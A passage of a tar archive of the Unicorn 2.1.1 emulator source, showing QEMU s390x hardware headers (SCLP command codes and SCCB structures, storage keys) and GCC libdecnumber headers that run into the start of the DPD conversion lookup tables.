intparm; uint32_t interrupt_id; }) IOIntCode; /* schid disintegration */ #define IOINST_SCHID_ONE(_schid) ((_schid & 0x00010000) >> 16) #define IOINST_SCHID_M(_schid) ((_schid & 0x00080000) >> 19) #define IOINST_SCHID_CSSID(_schid) ((_schid & 0xff000000) >> 24) #define IOINST_SCHID_SSID(_schid) ((_schid & 0x00060000) >> 17) #define IOINST_SCHID_NR(_schid) (_schid & 0x0000ffff) #define IO_INT_WORD_ISC(_int_word) ((_int_word & 0x38000000) >> 27) #define ISC_TO_ISC_BITS(_isc) ((0x80 >> _isc) << 24) #define IO_INT_WORD_AI 0x80000000 int ioinst_disassemble_sch_ident(uint32_t value, int *m, int *cssid, int *ssid, int *schid); #endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/hw/s390x/sclp.h����������������������������������������������������������0000664�0000000�0000000�00000016267�14675241067�0020230�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * SCLP Support * * Copyright IBM, Corp. 2012 * * Authors: * Christian Borntraeger <borntraeger@de.ibm.com> * * This work is licensed under the terms of the GNU GPL, version 2 or (at your * option) any later version. See the COPYING file in the top-level directory. * */ #ifndef HW_S390_SCLP_H #define HW_S390_SCLP_H //#include "hw/sysbus.h" #include "target/s390x/cpu-qom.h" #define SCLP_CMD_CODE_MASK 0xffff00ff /* SCLP command codes */ #define SCLP_CMDW_READ_SCP_INFO 0x00020001 #define SCLP_CMDW_READ_SCP_INFO_FORCED 0x00120001 #define SCLP_READ_STORAGE_ELEMENT_INFO 0x00040001 #define SCLP_ATTACH_STORAGE_ELEMENT 0x00080001 #define SCLP_ASSIGN_STORAGE 0x000D0001 #define SCLP_UNASSIGN_STORAGE 0x000C0001 #define SCLP_CMD_READ_EVENT_DATA 0x00770005 #define SCLP_CMD_WRITE_EVENT_DATA 0x00760005 #define SCLP_CMD_WRITE_EVENT_MASK 0x00780005 /* SCLP Memory hotplug codes */ #define SCLP_FC_ASSIGN_ATTACH_READ_STOR 0xE00000000000ULL #define SCLP_STARTING_SUBINCREMENT_ID 0x10001 #define SCLP_INCREMENT_UNIT 0x10000 #define MAX_STORAGE_INCREMENTS 1020 /* CPU hotplug SCLP codes */ #define SCLP_HAS_CPU_INFO 0x0C00000000000000ULL #define SCLP_CMDW_READ_CPU_INFO 0x00010001 #define SCLP_CMDW_CONFIGURE_CPU 0x00110001 #define SCLP_CMDW_DECONFIGURE_CPU 0x00100001 /* SCLP PCI codes */ #define SCLP_HAS_IOA_RECONFIG 0x0000000040000000ULL #define SCLP_CMDW_CONFIGURE_IOA 0x001a0001 #define SCLP_CMDW_DECONFIGURE_IOA 0x001b0001 #define SCLP_RECONFIG_PCI_ATYPE 2 /* SCLP response codes */ #define SCLP_RC_NORMAL_READ_COMPLETION 0x0010 #define SCLP_RC_NORMAL_COMPLETION 0x0020 #define SCLP_RC_SCCB_BOUNDARY_VIOLATION 0x0100 #define SCLP_RC_NO_ACTION_REQUIRED 0x0120 #define SCLP_RC_INVALID_SCLP_COMMAND 0x01f0 #define SCLP_RC_CONTAINED_EQUIPMENT_CHECK 0x0340 #define SCLP_RC_INSUFFICIENT_SCCB_LENGTH 0x0300 #define SCLP_RC_STANDBY_READ_COMPLETION 0x0410 #define SCLP_RC_ADAPTER_IN_RESERVED_STATE 0x05f0 #define SCLP_RC_ADAPTER_TYPE_NOT_RECOGNIZED 0x06f0 #define SCLP_RC_ADAPTER_ID_NOT_RECOGNIZED 0x09f0 #define SCLP_RC_INVALID_FUNCTION 0x40f0 #define SCLP_RC_NO_EVENT_BUFFERS_STORED 0x60f0 #define SCLP_RC_INVALID_SELECTION_MASK 0x70f0 #define SCLP_RC_INCONSISTENT_LENGTHS 0x72f0 #define SCLP_RC_EVENT_BUFFER_SYNTAX_ERROR 0x73f0 #define SCLP_RC_INVALID_MASK_LENGTH 0x74f0 /* Service Call Control Block (SCCB) and its elements */ #define SCCB_SIZE 4096 #define SCLP_VARIABLE_LENGTH_RESPONSE 0x80 #define SCLP_EVENT_BUFFER_ACCEPTED 0x80 #define SCLP_FC_NORMAL_WRITE 0 /* * Normally packed structures are not the right thing to do, since all code * must take care of endianness. We cannot use ldl_phys and friends for two * reasons, though: * - some of the embedded structures below the SCCB can appear multiple times * at different locations, so there is no fixed offset * - we work on a private copy of the SCCB, since there are several length * fields, that would cause a security nightmare if we allow the guest to * alter the structure while we parse it. We cannot use ldl_p and friends * either without doing pointer arithmetics * So we have to double check that all users of sclp data structures use the * right endianness wrappers. */ QEMU_PACK(typedef struct SCCBHeader { uint16_t length; uint8_t function_code; uint8_t control_mask[3]; uint16_t response_code; }) SCCBHeader; #define SCCB_DATA_LEN (SCCB_SIZE - sizeof(SCCBHeader)) #define SCCB_CPU_FEATURE_LEN 6 /* CPU information */ QEMU_PACK(typedef struct CPUEntry { uint8_t address; uint8_t reserved0; uint8_t features[SCCB_CPU_FEATURE_LEN]; uint8_t reserved2[6]; uint8_t type; uint8_t reserved1; }) CPUEntry; QEMU_PACK(typedef struct ReadInfo { SCCBHeader h; uint16_t rnmax; uint8_t rnsize; uint8_t _reserved1[16 - 11]; /* 11-15 */ uint16_t entries_cpu; /* 16-17 */ uint16_t offset_cpu; /* 18-19 */ uint8_t _reserved2[24 - 20]; /* 20-23 */ uint8_t loadparm[8]; /* 24-31 */ uint8_t _reserved3[48 - 32]; /* 32-47 */ uint64_t facilities; /* 48-55 */ uint8_t _reserved0[76 - 56]; /* 56-75 */ uint32_t ibc_val; uint8_t conf_char[99 - 80]; /* 80-98 */ uint8_t mha_pow; uint32_t rnsize2; uint64_t rnmax2; uint8_t _reserved6[116 - 112]; /* 112-115 */ uint8_t conf_char_ext[120 - 116]; /* 116-119 */ uint16_t highest_cpu; uint8_t _reserved5[124 - 122]; /* 122-123 */ uint32_t hmfai; struct CPUEntry entries[]; }) ReadInfo; QEMU_PACK(typedef struct ReadCpuInfo { SCCBHeader h; uint16_t nr_configured; /* 8-9 */ uint16_t offset_configured; /* 10-11 */ uint16_t nr_standby; /* 12-13 */ uint16_t offset_standby; /* 14-15 */ uint8_t reserved0[24-16]; /* 16-23 */ struct CPUEntry entries[]; }) ReadCpuInfo; QEMU_PACK(typedef struct ReadStorageElementInfo { SCCBHeader h; uint16_t max_id; uint16_t assigned; uint16_t standby; uint8_t _reserved0[16 - 14]; /* 14-15 */ uint32_t entries[]; }) ReadStorageElementInfo; QEMU_PACK(typedef struct AttachStorageElement { SCCBHeader h; uint8_t _reserved0[10 - 8]; /* 8-9 */ uint16_t assigned; uint8_t _reserved1[16 - 12]; /* 12-15 */ uint32_t entries[]; }) AttachStorageElement; QEMU_PACK(typedef struct AssignStorage { SCCBHeader h; uint16_t rn; }) AssignStorage; QEMU_PACK(typedef struct IoaCfgSccb { SCCBHeader header; uint8_t atype; uint8_t reserved1; uint16_t reserved2; uint32_t aid; }) IoaCfgSccb; QEMU_PACK(typedef struct SCCB { SCCBHeader h; char data[SCCB_DATA_LEN]; }) SCCB; #define TYPE_SCLP "sclp" #define SCLP(obj) OBJECT_CHECK(SCLPDevice, (obj), TYPE_SCLP) #define SCLP_CLASS(oc) OBJECT_CLASS_CHECK(SCLPDeviceClass, (oc), TYPE_SCLP) #define SCLP_GET_CLASS(obj) OBJECT_GET_CLASS(SCLPDeviceClass, (obj), TYPE_SCLP) typedef struct SCLPEventFacility SCLPEventFacility; typedef struct SCLPDevice { /* private */ CPUState parent_obj; SCLPEventFacility *event_facility; int increment_size; /* public */ } SCLPDevice; typedef struct SCLPDeviceClass { /* private */ DeviceClass parent_class; void (*read_SCP_info)(SCLPDevice *sclp, SCCB *sccb); void (*read_cpu_info)(SCLPDevice *sclp, SCCB *sccb); /* public */ void (*execute)(SCLPDevice *sclp, SCCB *sccb, uint32_t code); void (*service_interrupt)(SCLPDevice *sclp, uint32_t sccb); } SCLPDeviceClass; static inline int sccb_data_len(SCCB *sccb) { return be16_to_cpu(sccb->h.length) - sizeof(sccb->h); } void s390_sclp_init(void); void sclp_service_interrupt(uint32_t sccb); void raise_irq_cpu_hotplug(void); int sclp_service_call(CPUS390XState *env, uint64_t sccb, uint32_t code); #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/hw/s390x/storage-keys.h��������������������������������������������������0000664�0000000�0000000�00000003462�14675241067�0021675�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * s390 storage key device * * Copyright 2015 IBM Corp. * Author(s): Jason J. Herne <jjherne@linux.vnet.ibm.com> * * This work is licensed under the terms of the GNU GPL, version 2 or (at * your option) any later version. See the COPYING file in the top-level * directory. */ #ifndef S390_STORAGE_KEYS_H #define S390_STORAGE_KEYS_H #include "uc_priv.h" /* #define TYPE_S390_SKEYS "s390-skeys" #define S390_SKEYS(obj) \ OBJECT_CHECK(S390SKeysState, (obj), TYPE_S390_SKEYS) #define S390_CPU(obj) \ OBJECT_CHECK(S390CPU, (obj), TYPE_S390_CPU) #define S390_CPU(obj) ((S390CPU *)obj) */ typedef struct S390SKeysState { //CPUState parent_obj; bool migration_enabled; // Unicorn: Dummy struct member } S390SKeysState; /* #define S390_SKEYS_CLASS(klass) \ OBJECT_CLASS_CHECK(S390SKeysClass, (klass), TYPE_S390_SKEYS) */ #define S390_SKEYS_CLASS(klass) ((S390SKeysClass *)klass) /* #define S390_SKEYS_GET_CLASS(obj) \ OBJECT_GET_CLASS(S390SKeysClass, (obj), TYPE_S390_SKEYS) */ #define S390_SKEYS_GET_CLASS(obj) (((QEMUS390SKeysState *)obj)->class) typedef struct S390SKeysClass { //CPUClass parent_class; int (*skeys_enabled)(S390SKeysState *ks); int (*get_skeys)(S390SKeysState *ks, uint64_t start_gfn, uint64_t count, uint8_t *keys); int (*set_skeys)(S390SKeysState *ks, uint64_t start_gfn, uint64_t count, uint8_t *keys); } S390SKeysClass; #define TYPE_KVM_S390_SKEYS "s390-skeys-kvm" #define TYPE_QEMU_S390_SKEYS "s390-skeys-qemu" #define QEMU_S390_SKEYS(obj) \ (QEMUS390SKeysState*)(obj) typedef struct QEMUS390SKeysState { S390SKeysState parent_obj; uint8_t *keydata; uint32_t key_count; // Unicorn S390SKeysClass *class; } QEMUS390SKeysState; void s390_skeys_init(uc_engine *uc); #endif /* S390_STORAGE_KEYS_H */ ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/libdecnumber/������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0020231�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/libdecnumber/dconfig.h���������������������������������������������������0000664�0000000�0000000�00000002711�14675241067�0022014�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Configure decNumber for either host or target. Copyright (C) 2008 Free Software Foundation, Inc. This file is part of GCC. GCC is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ #if defined(HOST_WORDS_BIGENDIAN) #define WORDS_BIGENDIAN 1 #else #define WORDS_BIGENDIAN 0 #endif #ifndef DECDPUN #define DECDPUN 3 #endif �������������������������������������������������������unicorn-2.1.1/qemu/include/libdecnumber/decContext.h������������������������������������������������0000664�0000000�0000000�00000025074�14675241067�0022512�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Decimal context header module for the decNumber C Library. Copyright (C) 2005, 2007 Free Software Foundation, Inc. Contributed by IBM Corporation. Author Mike Cowlishaw. This file is part of GCC. GCC is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* ------------------------------------------------------------------ */ /* Decimal Context module header */ /* ------------------------------------------------------------------ */ /* */ /* Context variables must always have valid values: */ /* */ /* status -- [any bits may be cleared, but not set, by user] */ /* round -- must be one of the enumerated rounding modes */ /* */ /* The following variables are implied for fixed size formats (i.e., */ /* they are ignored) but should still be set correctly in case used */ /* with decNumber functions: */ /* */ /* clamp -- must be either 0 or 1 */ /* digits -- must be in the range 1 through 999999999 */ /* emax -- must be in the range 0 through 999999999 */ /* emin -- must be in the range 0 through -999999999 */ /* extended -- must be either 0 or 1 [present only if DECSUBSET] */ /* traps -- only defined bits may be set */ /* */ /* ------------------------------------------------------------------ */ #ifndef DECCONTEXT_H #define DECCONTEXT_H #define DECCNAME "decContext" /* Short name */ #define DECCFULLNAME "Decimal Context Descriptor" /* Verbose name */ #define DECCAUTHOR "Mike Cowlishaw" /* Who to blame */ /* Extended flags setting -- set this to 0 to use only IEEE flags */ #define DECEXTFLAG 1 /* 1=enable extended flags */ /* Conditional code flag -- set this to 0 for best performance */ #define DECSUBSET 0 /* 1=enable subset arithmetic */ /* Context for operations, with associated constants */ enum rounding { DEC_ROUND_CEILING, /* round towards +infinity */ DEC_ROUND_UP, /* round away from 0 */ DEC_ROUND_HALF_UP, /* 0.5 rounds up */ DEC_ROUND_HALF_EVEN, /* 0.5 rounds to nearest even */ DEC_ROUND_HALF_DOWN, /* 0.5 rounds down */ DEC_ROUND_DOWN, /* round towards 0 (truncate) */ DEC_ROUND_FLOOR, /* round towards -infinity */ DEC_ROUND_05UP, /* round for reround */ DEC_ROUND_MAX /* enum must be less than this */ }; #define DEC_ROUND_DEFAULT DEC_ROUND_HALF_EVEN; typedef struct { int32_t digits; /* working precision */ int32_t emax; /* maximum positive exponent */ int32_t emin; /* minimum negative exponent */ enum rounding round; /* rounding mode */ uint32_t traps; /* trap-enabler flags */ uint32_t status; /* status flags */ uint8_t clamp; /* flag: apply IEEE exponent clamp */ #if DECSUBSET uint8_t extended; /* flag: special-values allowed */ #endif } decContext; /* Maxima and Minima for context settings */ #define DEC_MAX_DIGITS 999999999 #define DEC_MIN_DIGITS 1 #define DEC_MAX_EMAX 999999999 #define DEC_MIN_EMAX 0 #define DEC_MAX_EMIN 0 #define DEC_MIN_EMIN -999999999 #define DEC_MAX_MATH 999999 /* max emax, etc., for math funcs. */ /* Classifications for decimal numbers, aligned with 754r (note */ /* that 'normal' and 'subnormal' are meaningful only with a */ /* decContext or a fixed size format). */ enum decClass { DEC_CLASS_SNAN, DEC_CLASS_QNAN, DEC_CLASS_NEG_INF, DEC_CLASS_NEG_NORMAL, DEC_CLASS_NEG_SUBNORMAL, DEC_CLASS_NEG_ZERO, DEC_CLASS_POS_ZERO, DEC_CLASS_POS_SUBNORMAL, DEC_CLASS_POS_NORMAL, DEC_CLASS_POS_INF }; /* Strings for the decClasses */ #define DEC_ClassString_SN "sNaN" #define DEC_ClassString_QN "NaN" #define DEC_ClassString_NI "-Infinity" #define DEC_ClassString_NN "-Normal" #define DEC_ClassString_NS "-Subnormal" #define DEC_ClassString_NZ "-Zero" #define DEC_ClassString_PZ "+Zero" #define DEC_ClassString_PS "+Subnormal" #define DEC_ClassString_PN "+Normal" #define DEC_ClassString_PI "+Infinity" #define DEC_ClassString_UN "Invalid" /* Trap-enabler and Status flags (exceptional conditions), and */ /* their names. The top byte is reserved for internal use */ #if DECEXTFLAG /* Extended flags */ #define DEC_Conversion_syntax 0x00000001 #define DEC_Division_by_zero 0x00000002 #define DEC_Division_impossible 0x00000004 #define DEC_Division_undefined 0x00000008 #define DEC_Insufficient_storage 0x00000010 /* [when malloc fails] */ #define DEC_Inexact 0x00000020 #define DEC_Invalid_context 0x00000040 #define DEC_Invalid_operation 0x00000080 #if DECSUBSET #define DEC_Lost_digits 0x00000100 #endif #define DEC_Overflow 0x00000200 #define DEC_Clamped 0x00000400 #define DEC_Rounded 0x00000800 #define DEC_Subnormal 0x00001000 #define DEC_Underflow 0x00002000 #else /* IEEE flags only */ #define DEC_Conversion_syntax 0x00000010 #define DEC_Division_by_zero 0x00000002 #define DEC_Division_impossible 0x00000010 #define DEC_Division_undefined 0x00000010 #define DEC_Insufficient_storage 0x00000010 /* [when malloc fails] */ #define DEC_Inexact 0x00000001 #define DEC_Invalid_context 0x00000010 #define DEC_Invalid_operation 0x00000010 #if DECSUBSET #define DEC_Lost_digits 0x00000000 #endif #define DEC_Overflow 0x00000008 #define DEC_Clamped 0x00000000 #define DEC_Rounded 0x00000000 #define DEC_Subnormal 0x00000000 #define DEC_Underflow 0x00000004 #endif /* IEEE 854 groupings for the flags */ /* [DEC_Clamped, DEC_Lost_digits, DEC_Rounded, and DEC_Subnormal */ /* are not in IEEE 854] */ #define DEC_IEEE_854_Division_by_zero (DEC_Division_by_zero) #if DECSUBSET #define DEC_IEEE_854_Inexact (DEC_Inexact | DEC_Lost_digits) #else #define DEC_IEEE_854_Inexact (DEC_Inexact) #endif #define DEC_IEEE_854_Invalid_operation (DEC_Conversion_syntax | \ DEC_Division_impossible | \ DEC_Division_undefined | \ DEC_Insufficient_storage | \ DEC_Invalid_context | \ DEC_Invalid_operation) #define DEC_IEEE_854_Overflow (DEC_Overflow) #define DEC_IEEE_854_Underflow (DEC_Underflow) /* flags which are normally errors (result is qNaN, infinite, or 0) */ #define DEC_Errors (DEC_IEEE_854_Division_by_zero | \ DEC_IEEE_854_Invalid_operation | \ DEC_IEEE_854_Overflow | DEC_IEEE_854_Underflow) /* flags which cause a result to become qNaN */ #define DEC_NaNs DEC_IEEE_854_Invalid_operation /* flags which are normally for information only (finite results) */ #if DECSUBSET #define DEC_Information (DEC_Clamped | DEC_Rounded | DEC_Inexact \ | DEC_Lost_digits) #else #define DEC_Information (DEC_Clamped | DEC_Rounded | DEC_Inexact) #endif /* Name strings for the exceptional conditions */ #define DEC_Condition_CS "Conversion syntax" #define DEC_Condition_DZ "Division by zero" #define DEC_Condition_DI "Division impossible" #define DEC_Condition_DU "Division undefined" #define DEC_Condition_IE "Inexact" #define DEC_Condition_IS "Insufficient storage" #define DEC_Condition_IC "Invalid context" #define DEC_Condition_IO "Invalid operation" #if DECSUBSET #define DEC_Condition_LD "Lost digits" #endif #define DEC_Condition_OV "Overflow" #define DEC_Condition_PA "Clamped" #define DEC_Condition_RO "Rounded" #define DEC_Condition_SU "Subnormal" #define DEC_Condition_UN "Underflow" #define DEC_Condition_ZE "No status" #define DEC_Condition_MU "Multiple status" #define DEC_Condition_Length 21 /* length of the longest string, */ /* including terminator */ /* Initialization descriptors, used by decContextDefault */ #define DEC_INIT_BASE 0 #define DEC_INIT_DECIMAL32 32 #define DEC_INIT_DECIMAL64 64 #define DEC_INIT_DECIMAL128 128 /* Synonyms */ #define DEC_INIT_DECSINGLE DEC_INIT_DECIMAL32 #define DEC_INIT_DECDOUBLE DEC_INIT_DECIMAL64 #define DEC_INIT_DECQUAD DEC_INIT_DECIMAL128 /* decContext routines */ extern decContext * decContextClearStatus(decContext *, uint32_t); extern decContext * decContextDefault(decContext *, int32_t); extern enum rounding decContextGetRounding(decContext *); extern uint32_t decContextGetStatus(decContext *); extern decContext * decContextRestoreStatus(decContext *, uint32_t, uint32_t); extern uint32_t decContextSaveStatus(decContext *, uint32_t); extern decContext * decContextSetRounding(decContext *, enum rounding); extern decContext * decContextSetStatus(decContext *, uint32_t); extern decContext * decContextSetStatusFromString(decContext *, const char *); extern decContext * decContextSetStatusFromStringQuiet(decContext *, const char *); extern decContext * decContextSetStatusQuiet(decContext *, uint32_t); extern const char * decContextStatusToString(const decContext *); extern uint32_t decContextTestSavedStatus(uint32_t, uint32_t); extern uint32_t decContextTestStatus(decContext *, uint32_t); extern decContext * decContextZeroStatus(decContext *); #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/libdecnumber/decDPD.h����������������������������������������������������0000664�0000000�0000000�00000264105�14675241067�0021475�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Conversion lookup tables for the decNumber C Library. Copyright (C) 2007 Free Software Foundation, Inc. Contributed by IBM Corporation. Author Mike Cowlishaw. This file is part of GCC. GCC is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* ------------------------------------------------------------------------ */ /* Binary Coded Decimal and Densely Packed Decimal conversion lookup tables */ /* [Automatically generated -- do not edit. 2007.05.05] */ /* ------------------------------------------------------------------------ */ /* ------------------------------------------------------------------------ */ /* For details, see: http://www2.hursley.ibm.com/decimal/DPDecimal.html */ /* This include file defines several DPD and BCD conversion tables: */ /* */ /* uint16_t BCD2DPD[2458]; -- BCD -> DPD (0x999 => 2457) */ /* uint16_t BIN2DPD[1000]; -- Bin -> DPD (999 => 2457) */ /* uint8_t BIN2CHAR[4001]; -- Bin -> CHAR (999 => '\3' '9' '9' '9') */ /* uint8_t BIN2BCD8[4000]; -- Bin -> bytes (999 => 9 9 9 3) */ /* uint16_t DPD2BCD[1024]; -- DPD -> BCD (0x3FF => 0x999) */ /* uint16_t DPD2BIN[1024]; -- DPD -> BIN (0x3FF => 999) */ /* uint32_t DPD2BINK[1024]; -- DPD -> BIN * 1000 (0x3FF => 999000) */ /* uint32_t DPD2BINM[1024]; -- DPD -> BIN * 1E+6 (0x3FF => 999000000) */ /* uint8_t DPD2BCD8[4096]; -- DPD -> bytes (x3FF => 9 9 9 3) */ /* */ /* In all cases the result (10 bits or 12 bits, or binary) is right-aligned */ /* in the table entry. BIN2CHAR entries are a single byte length (0 for */ /* value 0) followed by three digit characters; a trailing terminator is */ /* included to allow 4-char moves always. BIN2BCD8 and DPD2BCD8 entries */ /* are similar with the three BCD8 digits followed by a one-byte length */ /* (again, length=0 for value 0). */ /* */ /* To use a table, its name, prefixed with DEC_, must be defined with a */ /* value of 1 before this header file is included. For example: */ /* #define DEC_BCD2DPD 1 */ /* This mechanism allows software to only include tables that are needed. */ /* ------------------------------------------------------------------------ */ #if defined(DEC_BCD2DPD) && DEC_BCD2DPD==1 && !defined(DECBCD2DPD) #define DECBCD2DPD const uint16_t BCD2DPD[2458]={ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 0, 0, 0, 0, 0, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 0, 0, 0, 0, 0, 0, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 0, 0, 0, 0, 0, 0, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 0, 0, 0, 0, 0, 0, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 0, 0, 0, 0, 0, 0, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 0, 0, 0, 0, 0, 0, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 0, 0, 0, 0, 0, 0, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 0, 0, 0, 0, 0, 0, 10, 11, 42, 43, 74, 75, 106, 107, 78, 79, 0, 0, 0, 0, 0, 0, 26, 27, 58, 59, 90, 91, 122, 123, 94, 95, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 0, 0, 0, 0, 0, 0, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 0, 0, 0, 0, 0, 0, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 0, 0, 0, 0, 0, 0, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 0, 0, 0, 0, 0, 0, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 0, 0, 0, 0, 0, 0, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 0, 0, 0, 0, 0, 0, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 0, 0, 0, 0, 0, 0, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 0, 0, 0, 0, 0, 0, 138, 139, 170, 171, 202, 203, 234, 235, 206, 207, 0, 0, 0, 0, 0, 0, 154, 155, 186, 187, 218, 219, 250, 251, 222, 223, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 0, 0, 0, 0, 0, 0, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 0, 0, 0, 0, 0, 0, 288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 0, 0, 0, 0, 0, 0, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 0, 0, 0, 0, 0, 0, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 0, 0, 0, 0, 0, 0, 336, 337, 338, 339, 340, 341, 342, 343, 344, 345, 0, 0, 0, 0, 0, 0, 352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 0, 0, 0, 0, 0, 0, 368, 369, 370, 371, 372, 373, 374, 375, 376, 377, 0, 0, 0, 0, 0, 0, 266, 267, 298, 299, 330, 331, 362, 363, 334, 335, 0, 0, 0, 0, 0, 0, 282, 283, 314, 315, 346, 347, 378, 379, 350, 351, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 384, 385, 386, 387, 388, 389, 390, 391, 392, 393, 0, 0, 0, 0, 0, 0, 400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 0, 0, 0, 0, 0, 0, 416, 417, 418, 419, 420, 421, 422, 423, 424, 425, 0, 0, 0, 0, 0, 0, 432, 433, 434, 435, 436, 437, 438, 439, 440, 441, 0, 0, 0, 0, 0, 0, 448, 449, 450, 451, 452, 453, 454, 455, 456, 457, 0, 0, 0, 0, 0, 0, 464, 465, 466, 467, 468, 469, 470, 471, 472, 473, 0, 0, 0, 0, 0, 0, 480, 481, 482, 483, 484, 485, 486, 487, 488, 489, 0, 0, 0, 0, 0, 0, 496, 497, 498, 499, 500, 501, 502, 503, 504, 505, 0, 0, 0, 0, 0, 0, 394, 395, 426, 427, 458, 459, 490, 491, 462, 463, 0, 0, 0, 0, 0, 0, 410, 411, 442, 443, 474, 475, 506, 507, 478, 479, 0, 